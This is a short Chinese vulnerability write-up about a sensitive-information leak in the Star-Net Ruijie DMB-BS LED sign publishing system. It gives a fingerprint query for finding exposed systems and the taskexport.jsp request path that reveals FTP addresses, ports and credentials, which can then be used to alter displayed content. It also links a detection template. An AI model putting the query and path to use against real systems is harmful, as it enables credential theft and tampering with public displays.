# 星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露
**一、漏洞简介**
星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露,攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码,通过 FTP 可篡改 LED 发布信息
**二、影响版本**
星网锐捷信息发布系统
**三、资产测绘**
```plain
app="STAR_NET-数字标牌系统"
```

●登录
**四、漏洞复现**
```plain
/dmb/out/taskexport.jsp?taskcode
```

[XWRJ-DMB-BS-InformationLeakage.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1719200545313-daca3f8d-524a-48d9-83ba-d930e0d9385b.yaml)
> 更新: 2024-06-24 11:42:25
> 原文: